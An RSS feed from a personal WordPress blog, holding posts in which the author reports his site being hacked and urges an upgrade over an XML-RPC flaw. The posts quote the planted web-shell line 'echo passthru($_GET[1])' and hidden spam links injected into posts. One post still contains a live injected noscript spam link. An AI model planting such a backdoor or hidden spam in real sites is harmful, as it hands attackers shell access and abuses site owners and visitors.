<?xml version="1.0" encoding="UTF-8"?> <rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" ><channel><title>Alexander Holbreich&#187; security</title> <atom:link href="http://alexander.holbreich.org/tag/security/feed/" rel="self" type="application/rss+xml" /><link>http://alexander.holbreich.org</link> <description>Everything becomes a little different as soon as it is spoken out loud.  ~Hermann Hesse</description> <lastBuildDate>Wed, 01 Feb 2012 22:44:21 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <item><title>Back again</title><link>http://alexander.holbreich.org/2008/04/back-again/</link> <comments>http://alexander.holbreich.org/2008/04/back-again/#comments</comments> <pubDate>Wed, 16 Apr 2008 21:58:47 +0000</pubDate> <dc:creator>shuron</dc:creator> <category><![CDATA[off topic]]></category> <category><![CDATA[Personal]]></category> <category><![CDATA[WordPress]]></category> <category><![CDATA[blogging]]></category> <category><![CDATA[security]]></category><guid isPermaLink="false">http://alexander.holbreich.org2008/04/back-again/</guid> <description><![CDATA[It&#8217;s pretty difficult to start write again after such pause. My wife and my Son are away for a holidays, so I must found some time to write to my blog. But where to begin. So many thing are happened in the last time. Ok , I know I begin with the introducing of the [...]]]></description> <content:encoded><![CDATA[<p>It&#8217;s pretty difficult to start write again after such pause. My wife and my Son are away for a holidays, so I must found some time to write to my blog. But where to begin. So many thing are happened in the last time.</p><p>Ok , I know I begin with the introducing of the <a href="http://paulina.holbreich.de" title="Polja">My wife&#8217;s Blog</a>. It&#8217;s about books, travel and geography, because my darling do study at the Faculty of Geography. You might find it also interesting even when you will not find there many articles about IT <img src="http://alexander.holbreich.org/wp-includes/images/smilies/icon_wink.gif?4c9b33" alt=';)' class='wp-smiley' /> However her English is much better than my <img src="http://alexander.holbreich.org/wp-includes/images/smilies/icon_wink.gif?4c9b33" alt=';)' class='wp-smiley' /></p><p>Back to this blog. As you know WordPress 2.5 is out. And somehow there are no security updates at that time. How it comes? Did the WordPress guys didn&#8217;t their work really good this time? <img src="http://alexander.holbreich.org/wp-includes/images/smilies/icon_wink.gif?4c9b33" alt=';)' class='wp-smiley' />   Seems to be. So I consider to upgrade in the next time.</p><div class="sociable"><div class="sociable_tagline"><a class='sociable_tagline' target='_blank' href='http://blogplay.com' style='font-size:11px;color:#333333;text-decoration:none'>Be Sociable, Share!</a></div><ul class='clearfix'><li><a title="Facebook" class="option1_16" style="background-position:-48px 0px" rel="nofollow" target="_blank" href="http://www.facebook.com/share.php?u=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;t=Back%20again"></a></li><li><a title="HackerNews" class="option1_16" style="background-position:-128px 0px" rel="nofollow" target="_blank" href="http://news.ycombinator.com/submitlink?u=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;t=Back%20again"></a></li><li><a title="Reddit" class="option1_16" style="background-position:-64px -16px" rel="nofollow" target="_blank" href="http://reddit.com/submit?url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;title=Back%20again"></a></li><li><a title="Digg" class="option1_16" style="background-position:-32px 0px" rel="nofollow" target="_blank" href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;title=Back%20again&amp;bodytext=It%27s%20pretty%20difficult%20to%20start%20write%20again%20after%20such%20pause.%20My%20wife%20and%20my%20Son%20are%20away%20for%20a%20holidays%2C%20so%20I%20must%20found%20some%20time%20to%20write%20to%20my%20blog.%20But%20where%20to%20begin.%20So%20many%20thing%20are%20happened%20in%20the%20last%20time.%0D%0A%0D%0AOk%20%2C%20I%20know%20I%20begin%20with%20the%20i"></a></li><li><a title="Tumblr" class="option1_16" style="background-position:-128px -16px" rel="nofollow" target="_blank" href="http://www.tumblr.com/share?v=3&amp;u=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;t=Back%20again&amp;s=It%27s%20pretty%20difficult%20to%20start%20write%20again%20after%20such%20pause.%20My%20wife%20and%20my%20Son%20are%20away%20for%20a%20holidays%2C%20so%20I%20must%20found%20some%20time%20to%20write%20to%20my%20blog.%20But%20where%20to%20begin.%20So%20many%20thing%20are%20happened%20in%20the%20last%20time.%0D%0A%0D%0AOk%20%2C%20I%20know%20I%20begin%20with%20the%20i"></a></li><li><a title="BlinkList" class="option1_16" style="background-position:0px 0px" rel="nofollow" target="_blank" href="http://www.blinklist.com/index.php?Action=Blink/addblink.php&amp;Url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;Title=Back%20again"></a></li><li><a title="Google Reader" class="option1_16" style="background-position:-112px 0px" rel="nofollow" target="_blank" href="http://www.google.com/reader/link?url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;title=Back%20again&amp;srcURL=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;srcTitle=Alexander+Holbreich+Everything+becomes+a+little+different+as+soon+as+it+is+spoken+out+loud.++%7EHermann+Hesse"></a></li><li><a title="StumbleUpon" class="option1_16" style="background-position:-112px -16px" rel="nofollow" target="_blank" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&title=Back%20again"></a></li><li><a title="Myspace" class="option1_16" style="background-position:0px -16px" rel="nofollow" target="_blank" href="http://www.myspace.com/Modules/PostTo/Pages/?u=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;t=Back%20again"></a></li><li><a title="Sphinn" class="option1_16" style="background-position:-96px -16px" rel="nofollow" target="_blank" href="http://sphinn.com/index.php?c=post&amp;m=submit&amp;link=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F"></a></li><li><a class="option1_16" style="cursor:pointer;background-position:-64px 0px" rel="nofollow" title="Add to favorites - doesn't work in Chrome"  onClick="javascript:AddToFavorites();"></a></li><li><a title="Posterous" class="option1_16" style="background-position:-32px -16px" rel="nofollow" target="_blank" href="http://posterous.com/share?linkto=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;title=Back%20again&amp;selection=It%27s%20pretty%20difficult%20to%20start%20write%20again%20after%20such%20pause.%20My%20wife%20and%20my%20Son%20are%20away%20for%20a%20holidays%2C%20so%20I%20must%20found%20some%20time%20to%20write%20to%20my%20blog.%20But%20where%20to%20begin.%20So%20many%20thing%20are%20happened%20in%20the%20last%20time.%0D%0A%0D%0AOk%20%2C%20I%20know%20I%20begin%20with%20the%20i"></a></li></ul><div onMouseout="fixOnMouseOut(this,event,'post-164')" id="sociable-post-164" style="display:none;"><div style="top: auto; left: auto; display: block;" id="sociable"><div class="popup"><div class="content"><ul><li style="heigth:16px;width:16px"><a title="Twitter" class="option1_16" style="background-position:-144px -16px" rel="nofollow" target="_blank" href="http://twitter.com/intent/tweet?text=Back%20again%20-%20http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F%20(via%20@sociablesite)"></a></li><li style="heigth:16px;width:16px"><a title="LinkedIn" class="option1_16" style="background-position:-144px 0px" rel="nofollow" target="_blank" href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;title=Back%20again&amp;source=Alexander+Holbreich+Everything+becomes+a+little+different+as+soon+as+it+is+spoken+out+loud.++%7EHermann+Hesse&amp;summary=It%27s%20pretty%20difficult%20to%20start%20write%20again%20after%20such%20pause.%20My%20wife%20and%20my%20Son%20are%20away%20for%20a%20holidays%2C%20so%20I%20must%20found%20some%20time%20to%20write%20to%20my%20blog.%20But%20where%20to%20begin.%20So%20many%20thing%20are%20happened%20in%20the%20last%20time.%0D%0A%0D%0AOk%20%2C%20I%20know%20I%20begin%20with%20the%20i"></a></li><li style="heigth:16px;width:16px"><a title="Delicious" class="option1_16" style="background-position:-16px 0px" rel="nofollow" target="_blank" href="http://delicious.com/post?url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;title=Back%20again&amp;notes=It%27s%20pretty%20difficult%20to%20start%20write%20again%20after%20such%20pause.%20My%20wife%20and%20my%20Son%20are%20away%20for%20a%20holidays%2C%20so%20I%20must%20found%20some%20time%20to%20write%20to%20my%20blog.%20But%20where%20to%20begin.%20So%20many%20thing%20are%20happened%20in%20the%20last%20time.%0D%0A%0D%0AOk%20%2C%20I%20know%20I%20begin%20with%20the%20i"></a></li><li style="heigth:16px;width:16px"><a title="Google Bookmarks" class="option1_16" style="background-position:-96px 0px" rel="nofollow" target="_blank" href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;title=Back%20again&amp;annotation=It%27s%20pretty%20difficult%20to%20start%20write%20again%20after%20such%20pause.%20My%20wife%20and%20my%20Son%20are%20away%20for%20a%20holidays%2C%20so%20I%20must%20found%20some%20time%20to%20write%20to%20my%20blog.%20But%20where%20to%20begin.%20So%20many%20thing%20are%20happened%20in%20the%20last%20time.%0D%0A%0D%0AOk%20%2C%20I%20know%20I%20begin%20with%20the%20i"></a></li><li style="heigth:16px;width:16px"><a title="MSNReporter" class="option1_16" style="background-position:-176px 0px" rel="nofollow" target="_blank" href="http://reporter.es.msn.com/?fn=contribute&amp;Title=Back%20again&amp;URL=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;cat_id=6&amp;tag_id=31&amp;Remark=It%27s%20pretty%20difficult%20to%20start%20write%20again%20after%20such%20pause.%20My%20wife%20and%20my%20Son%20are%20away%20for%20a%20holidays%2C%20so%20I%20must%20found%20some%20time%20to%20write%20to%20my%20blog.%20But%20where%20to%20begin.%20So%20many%20thing%20are%20happened%20in%20the%20last%20time.%0D%0A%0D%0AOk%20%2C%20I%20know%20I%20begin%20with%20the%20i"></a></li><li style="heigth:16px;width:16px"><a title="email" class="option1_16" style="background-position:-80px 0px" rel="nofollow" target="_blank" href="https://mail.google.com/mail/?view=cm&fs=1&to&su=Back%20again&body=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&ui=2&tf=1&shva=1"></a></li><li style="heigth:16px;width:16px"><a style="cursor:poainter" rel="nofollow"   onMouseOver="more(this,'post-164')"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/option1/16/more.png?4c9b33" title="Posterous" alt="Posterous" /></a></li></ul></div> <a style="cursor:pointer" onclick="hide_sociable('post-164',true)" class="close"> <img onclick="hide_sociable('post-164',true)" title="close" src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/closelabel.png?4c9b33"> </a></div></div></div></div><div class='sociable' style='float:none'><ul class='clearfix'><li id="Twitter_Counter"><a href="https://twitter.com/share" data-text="Back again - http://alexander.holbreich.org/2008/04/back-again/ (via #sociablesite)" data-url="http://alexander.holbreich.org/2008/04/back-again/" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="//platform.twitter.com/widgets.js?4c9b33"></script></li><li id="Google_p"><g:plusone annotation="bubble" href="http://alexander.holbreich.org/2008/04/back-again/" size="medium"></g:plusone></li><li id="Digg_Counter"><script type='text/javascript'>(function(){var s=document.createElement('SCRIPT'),s1=document.getElementsByTagName('SCRIPT')[0];s.type='text/javascript';s.async=true;s.src='http://widgets.digg.com/buttons.js';s1.parentNode.insertBefore(s,s1);})();</script><a href='http://digg.com/submit?url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F04%2Fback-again%2F&amp;title=Back%20again'  class='DiggThisButton DiggCompact'></a></li><li id="StumbleUpon_Counter"><script src="http://www.stumbleupon.com/hostedbadge.php?s=2&r=http://alexander.holbreich.org/2008/04/back-again/"></script></li><li id="Facebook_Counter"><iframe src="//www.facebook.com/plugins/like.php?href=http://alexander.holbreich.org/2008/04/back-again/&send=false&layout=button_count&show_faces=false&action=like&colorscheme=light&font" scrolling="no" frameborder="0" style="border:none; overflow:hidden;height:32px;width:100px" allowTransparency="true"></iframe></li><li id="LinkedIn_Counter"><script src="http://platform.linkedin.com/in.js" type="text/javascript"></script><script type="IN/Share" data-url="http://alexander.holbreich.org/2008/04/back-again/" data-counter="right"></script></li></ul></div>]]></content:encoded> <wfw:commentRss>http://alexander.holbreich.org/2008/04/back-again/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>WordPress 2.3.3 fixes XML-RPC bug</title><link>http://alexander.holbreich.org/2008/02/wordpress-233-fixes-xml-rpc-bug/</link> <comments>http://alexander.holbreich.org/2008/02/wordpress-233-fixes-xml-rpc-bug/#comments</comments> <pubDate>Tue, 05 Feb 2008 08:06:43 +0000</pubDate> <dc:creator>shuron</dc:creator> <category><![CDATA[WordPress]]></category> <category><![CDATA[security]]></category> <category><![CDATA[XML-RPC]]></category><guid isPermaLink="false">http://alexander.holbreich.org2008/02/wordpress-233-fixes-xml-rpc-bug/</guid> <description><![CDATA[Please upgrade your WordPress blog as sun as possible to the released version 2.3.3, because there are security reasons for it. Further check the content of your posts in the code perspective, because maybe it was changed by some intruders, which have possibly used XML-RCP Bug in the WordPress version 2.3.2. &#8230; A flaw was [...]]]></description> <content:encoded><![CDATA[<p>Please upgrade your WordPress blog as sun as possible to the released <a href="http://wordpress.org/development/2008/02/wordpress-233/" target="_blank">version 2.3.3</a>, because there are security reasons for it. Further check the content of your posts in the code perspective, because maybe it was changed by some intruders, which have possibly used XML-RCP Bug in the WordPress version 2.3.2.</p><p><span style="font-style: italic"> &#8230; A flaw was found in our XML-RPC implementation such that a specially crafted request would allow any valid user to edit posts of any other user on that blog. &#8230;</span><br /> So e.g. I found some strange code lines in my several posts looking like:</p><p>&lt;noscript&gt;Furious franchise is a decision internets download nextel &lt;a( deleted href)&gt; madonna ringtones&lt;/a&gt; software and.&lt;/noscript&gt;</p><p>&lt;noscript&gt;Forse vi piacerebbe il software, o l&#8217;interfaccia di una particolare &lt;a( deleted href)&gt;poker&lt;/a&gt; room, o forse no.&lt;/noscript&gt;</p><p>I definitely have not inserted them in to my posts. So how did they get into it? They could be inserted by some Plug-in but they looks so as should be <span style="font-weight: bold">hidden </span>to my eyes, and make few sense for any plug in. Therefore my theory is that they where inserted by bad guys, that used out some of security bugs in wordpress. Presumably they may be used mentioned XML-RPC Bug in the WordPress version 2.3.2.</p><p style="font-weight: bold">Please let me know if you know more about these strange lines.</p><p> P.S. In addition i have deleted some unknown users, because my observation point me to some the believe that this could be the violation of security to. So if you wanna subscribe to the comments or Posts, use RSS. Thank you for understanding.</p><div class="sociable"><div class="sociable_tagline"><a class='sociable_tagline' target='_blank' href='http://blogplay.com' style='font-size:11px;color:#333333;text-decoration:none'>Be Sociable, Share!</a></div><ul class='clearfix'><li><a title="Facebook" class="option1_16" style="background-position:-48px 0px" rel="nofollow" target="_blank" href="http://www.facebook.com/share.php?u=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;t=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20"></a></li><li><a title="HackerNews" class="option1_16" style="background-position:-128px 0px" rel="nofollow" target="_blank" href="http://news.ycombinator.com/submitlink?u=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;t=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20"></a></li><li><a title="Reddit" class="option1_16" style="background-position:-64px -16px" rel="nofollow" target="_blank" href="http://reddit.com/submit?url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20"></a></li><li><a title="Digg" class="option1_16" style="background-position:-32px 0px" rel="nofollow" target="_blank" href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20&amp;bodytext=Please%20upgrade%20your%20Wordpress%20blog%20as%20sun%20as%20possible%20to%20the%20released%20version%202.3.3%2C%20because%20there%20are%20security%20reasons%20for%20it.%20Further%20check%20the%20content%20of%20your%20posts%20in%20the%20code%20perspective%2C%20because%20maybe%20it%20was%20changed%20by%20some%20intruders%2C%20which%20hav"></a></li><li><a title="Tumblr" class="option1_16" style="background-position:-128px -16px" rel="nofollow" target="_blank" href="http://www.tumblr.com/share?v=3&amp;u=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;t=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20&amp;s=Please%20upgrade%20your%20Wordpress%20blog%20as%20sun%20as%20possible%20to%20the%20released%20version%202.3.3%2C%20because%20there%20are%20security%20reasons%20for%20it.%20Further%20check%20the%20content%20of%20your%20posts%20in%20the%20code%20perspective%2C%20because%20maybe%20it%20was%20changed%20by%20some%20intruders%2C%20which%20hav"></a></li><li><a title="BlinkList" class="option1_16" style="background-position:0px 0px" rel="nofollow" target="_blank" href="http://www.blinklist.com/index.php?Action=Blink/addblink.php&amp;Url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;Title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20"></a></li><li><a title="Google Reader" class="option1_16" style="background-position:-112px 0px" rel="nofollow" target="_blank" href="http://www.google.com/reader/link?url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20&amp;srcURL=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;srcTitle=Alexander+Holbreich+Everything+becomes+a+little+different+as+soon+as+it+is+spoken+out+loud.++%7EHermann+Hesse"></a></li><li><a title="StumbleUpon" class="option1_16" style="background-position:-112px -16px" rel="nofollow" target="_blank" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20"></a></li><li><a title="Myspace" class="option1_16" style="background-position:0px -16px" rel="nofollow" target="_blank" href="http://www.myspace.com/Modules/PostTo/Pages/?u=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;t=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20"></a></li><li><a title="Sphinn" class="option1_16" style="background-position:-96px -16px" rel="nofollow" target="_blank" href="http://sphinn.com/index.php?c=post&amp;m=submit&amp;link=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F"></a></li><li><a class="option1_16" style="cursor:pointer;background-position:-64px 0px" rel="nofollow" title="Add to favorites - doesn't work in Chrome"  onClick="javascript:AddToFavorites();"></a></li><li><a title="Posterous" class="option1_16" style="background-position:-32px -16px" rel="nofollow" target="_blank" href="http://posterous.com/share?linkto=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20&amp;selection=Please%20upgrade%20your%20Wordpress%20blog%20as%20sun%20as%20possible%20to%20the%20released%20version%202.3.3%2C%20because%20there%20are%20security%20reasons%20for%20it.%20Further%20check%20the%20content%20of%20your%20posts%20in%20the%20code%20perspective%2C%20because%20maybe%20it%20was%20changed%20by%20some%20intruders%2C%20which%20hav"></a></li></ul><div onMouseout="fixOnMouseOut(this,event,'post-143')" id="sociable-post-143" style="display:none;"><div style="top: auto; left: auto; display: block;" id="sociable"><div class="popup"><div class="content"><ul><li style="heigth:16px;width:16px"><a title="Twitter" class="option1_16" style="background-position:-144px -16px" rel="nofollow" target="_blank" href="http://twitter.com/intent/tweet?text=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20%20-%20http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F%20(via%20@sociablesite)"></a></li><li style="heigth:16px;width:16px"><a title="LinkedIn" class="option1_16" style="background-position:-144px 0px" rel="nofollow" target="_blank" href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20&amp;source=Alexander+Holbreich+Everything+becomes+a+little+different+as+soon+as+it+is+spoken+out+loud.++%7EHermann+Hesse&amp;summary=Please%20upgrade%20your%20Wordpress%20blog%20as%20sun%20as%20possible%20to%20the%20released%20version%202.3.3%2C%20because%20there%20are%20security%20reasons%20for%20it.%20Further%20check%20the%20content%20of%20your%20posts%20in%20the%20code%20perspective%2C%20because%20maybe%20it%20was%20changed%20by%20some%20intruders%2C%20which%20hav"></a></li><li style="heigth:16px;width:16px"><a title="Delicious" class="option1_16" style="background-position:-16px 0px" rel="nofollow" target="_blank" href="http://delicious.com/post?url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20&amp;notes=Please%20upgrade%20your%20Wordpress%20blog%20as%20sun%20as%20possible%20to%20the%20released%20version%202.3.3%2C%20because%20there%20are%20security%20reasons%20for%20it.%20Further%20check%20the%20content%20of%20your%20posts%20in%20the%20code%20perspective%2C%20because%20maybe%20it%20was%20changed%20by%20some%20intruders%2C%20which%20hav"></a></li><li style="heigth:16px;width:16px"><a title="Google Bookmarks" class="option1_16" style="background-position:-96px 0px" rel="nofollow" target="_blank" href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20&amp;annotation=Please%20upgrade%20your%20Wordpress%20blog%20as%20sun%20as%20possible%20to%20the%20released%20version%202.3.3%2C%20because%20there%20are%20security%20reasons%20for%20it.%20Further%20check%20the%20content%20of%20your%20posts%20in%20the%20code%20perspective%2C%20because%20maybe%20it%20was%20changed%20by%20some%20intruders%2C%20which%20hav"></a></li><li style="heigth:16px;width:16px"><a title="MSNReporter" class="option1_16" style="background-position:-176px 0px" rel="nofollow" target="_blank" href="http://reporter.es.msn.com/?fn=contribute&amp;Title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20&amp;URL=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;cat_id=6&amp;tag_id=31&amp;Remark=Please%20upgrade%20your%20Wordpress%20blog%20as%20sun%20as%20possible%20to%20the%20released%20version%202.3.3%2C%20because%20there%20are%20security%20reasons%20for%20it.%20Further%20check%20the%20content%20of%20your%20posts%20in%20the%20code%20perspective%2C%20because%20maybe%20it%20was%20changed%20by%20some%20intruders%2C%20which%20hav"></a></li><li style="heigth:16px;width:16px"><a title="email" class="option1_16" style="background-position:-80px 0px" rel="nofollow" target="_blank" href="https://mail.google.com/mail/?view=cm&fs=1&to&su=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20&body=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&ui=2&tf=1&shva=1"></a></li><li style="heigth:16px;width:16px"><a style="cursor:poainter" rel="nofollow"   onMouseOver="more(this,'post-143')"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/option1/16/more.png?4c9b33" title="Posterous" alt="Posterous" /></a></li></ul></div> <a style="cursor:pointer" onclick="hide_sociable('post-143',true)" class="close"> <img onclick="hide_sociable('post-143',true)" title="close" src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/closelabel.png?4c9b33"> </a></div></div></div></div><div class='sociable' style='float:none'><ul class='clearfix'><li id="Twitter_Counter"><a href="https://twitter.com/share" data-text="Wordpress 2.3.3 fixes XML-RPC bug  - http://alexander.holbreich.org/2008/02/wordpress-233-fixes-xml-rpc-bug/ (via #sociablesite)" data-url="http://alexander.holbreich.org/2008/02/wordpress-233-fixes-xml-rpc-bug/" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="//platform.twitter.com/widgets.js?4c9b33"></script></li><li id="Google_p"><g:plusone annotation="bubble" href="http://alexander.holbreich.org/2008/02/wordpress-233-fixes-xml-rpc-bug/" size="medium"></g:plusone></li><li id="Digg_Counter"><script type='text/javascript'>(function(){var s=document.createElement('SCRIPT'),s1=document.getElementsByTagName('SCRIPT')[0];s.type='text/javascript';s.async=true;s.src='http://widgets.digg.com/buttons.js';s1.parentNode.insertBefore(s,s1);})();</script><a href='http://digg.com/submit?url=http%3A%2F%2Falexander.holbreich.org%2F2008%2F02%2Fwordpress-233-fixes-xml-rpc-bug%2F&amp;title=Wordpress%202.3.3%20fixes%20XML-RPC%20bug%20'  class='DiggThisButton DiggCompact'></a></li><li id="StumbleUpon_Counter"><script src="http://www.stumbleupon.com/hostedbadge.php?s=2&r=http://alexander.holbreich.org/2008/02/wordpress-233-fixes-xml-rpc-bug/"></script></li><li id="Facebook_Counter"><iframe src="//www.facebook.com/plugins/like.php?href=http://alexander.holbreich.org/2008/02/wordpress-233-fixes-xml-rpc-bug/&send=false&layout=button_count&show_faces=false&action=like&colorscheme=light&font" scrolling="no" frameborder="0" style="border:none; overflow:hidden;height:32px;width:100px" allowTransparency="true"></iframe></li><li id="LinkedIn_Counter"><script src="http://platform.linkedin.com/in.js" type="text/javascript"></script><script type="IN/Share" data-url="http://alexander.holbreich.org/2008/02/wordpress-233-fixes-xml-rpc-bug/" data-counter="right"></script></li></ul></div>]]></content:encoded> <wfw:commentRss>http://alexander.holbreich.org/2008/02/wordpress-233-fixes-xml-rpc-bug/feed/</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>I was hacked, thank open source</title><link>http://alexander.holbreich.org/2007/07/i-was-hacked-thank-open-source/</link> <comments>http://alexander.holbreich.org/2007/07/i-was-hacked-thank-open-source/#comments</comments> <pubDate>Fri, 13 Jul 2007 14:50:02 +0000</pubDate> <dc:creator>shuron</dc:creator> <category><![CDATA[CMS]]></category> <category><![CDATA[WordPress]]></category> <category><![CDATA[open source]]></category> <category><![CDATA[security]]></category><guid isPermaLink="false">http://alexander.holbreich.org2007/07/i-was-hacked-thank-open-source/</guid> <description><![CDATA[Maybe you notice the downtime of this site last days. Unfortunately it was hacked by someone for unknown purpose. The attackers uses some exploit in wordpress or some plug in or maybe of k2 theme. Some malfunction of these open source components was used out, so that attacker have added lines like echo passthru($_GET[1]); to [...]]]></description> <content:encoded><![CDATA[<p>Maybe you notice the downtime of this site last days. Unfortunately it was hacked by someone for unknown purpose. The attackers uses some exploit in wordpress or some plug in or maybe of k2 theme. Some malfunction of these open source components was used out, so that attacker have added lines like</p><p><em>echo passthru($_GET[1]);</em></p><p>to some of php files. That gives them access to shell of my user account on this server. Bad thing it that other domains of mine where affected too. The &#8220;Forbidden&#8221; you probably have seen, was initiated by my server administrator to prevent broadening<noscript>&amp;lt;a href=&#8221;http://www.flintgraphics.com&#8221; mce_href=&#8221;http://www.flintgraphics.com&#8221;&amp;gt;free ringtones&amp;lt;/a&amp;gt; for 1 minute.</noscript> of the attack.</p><p>I could not find the exactly place of the initial exploit yet. But attackers have left many of traces. So that I was able to reconstruct the rest and remove backdoors. This was a new experience, especially I learned in seconds, that it is better to separate my popular projects from insecure open source playgrounds, like this site actually is.</p><p>And on holbreich .de i turned all possible security mechanisms on, till final clarification is done. So you can&#8217;t leave comments at the moment cause we are still under carnitine!</p><p>P.S. That hackers left some strange move on one of my domains for download to use out the traffic and space. Some was some strange comedy about two gay man. It was in some strange language, so I could not laugh <img src="http://alexander.holbreich.org/wp-includes/images/smilies/icon_sad.gif?4c9b33" alt=':(' class='wp-smiley' /></p><div class="sociable"><div class="sociable_tagline"><a class='sociable_tagline' target='_blank' href='http://blogplay.com' style='font-size:11px;color:#333333;text-decoration:none'>Be Sociable, Share!</a></div><ul class='clearfix'><li><a title="Facebook" class="option1_16" style="background-position:-48px 0px" rel="nofollow" target="_blank" href="http://www.facebook.com/share.php?u=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;t=I%20was%20hacked%2C%20thank%20open%20source"></a></li><li><a title="HackerNews" class="option1_16" style="background-position:-128px 0px" rel="nofollow" target="_blank" href="http://news.ycombinator.com/submitlink?u=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;t=I%20was%20hacked%2C%20thank%20open%20source"></a></li><li><a title="Reddit" class="option1_16" style="background-position:-64px -16px" rel="nofollow" target="_blank" href="http://reddit.com/submit?url=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;title=I%20was%20hacked%2C%20thank%20open%20source"></a></li><li><a title="Digg" class="option1_16" style="background-position:-32px 0px" rel="nofollow" target="_blank" 